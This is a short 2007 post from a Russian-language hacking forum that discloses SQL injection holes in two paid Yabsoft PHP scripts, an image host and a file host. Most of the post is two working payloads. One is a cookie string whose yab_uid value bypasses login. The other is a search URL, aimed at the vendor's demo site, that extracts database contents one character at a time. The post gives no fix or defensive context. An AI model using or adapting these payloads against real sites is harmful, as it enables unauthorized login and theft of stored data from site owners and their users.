Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Advanced Image/FILE Hosting Script (https://forum.antichat.xyz/showthread.php?t=43284)

gemaglabin 28.06.2007 13:20

Advanced Image/FILE Hosting Script
 
Уязвимости в платных продуктах от Yabsoft.com , в галлерее и скрипте файлообменника.Для эксплуатации обоих требуется magic_quote_gpc off.

MFH - иньекция в куках ( google )

Код:

yab_uploadmode=2; pass_hash=0; yab_logined=1; yab_last_click=1183021167; yab_autologin=1; yab_uid=0'+or+1=1/*; yab_passhash=c4ca4238a0b923820dcc509a6f75849b;yab_uploadmode=0;yab_sess_id=123;
AIM - возможен посимвольный перебор информации , хранящейся в базе данных. ( google )

Код:

http://www.yabsoft.info/demo/aihspro/search.php?text=%')+or+ascii(substring((select+1+from+users+limit+1),1,1))%3E0/*&dosearch=Search


Время: 03:19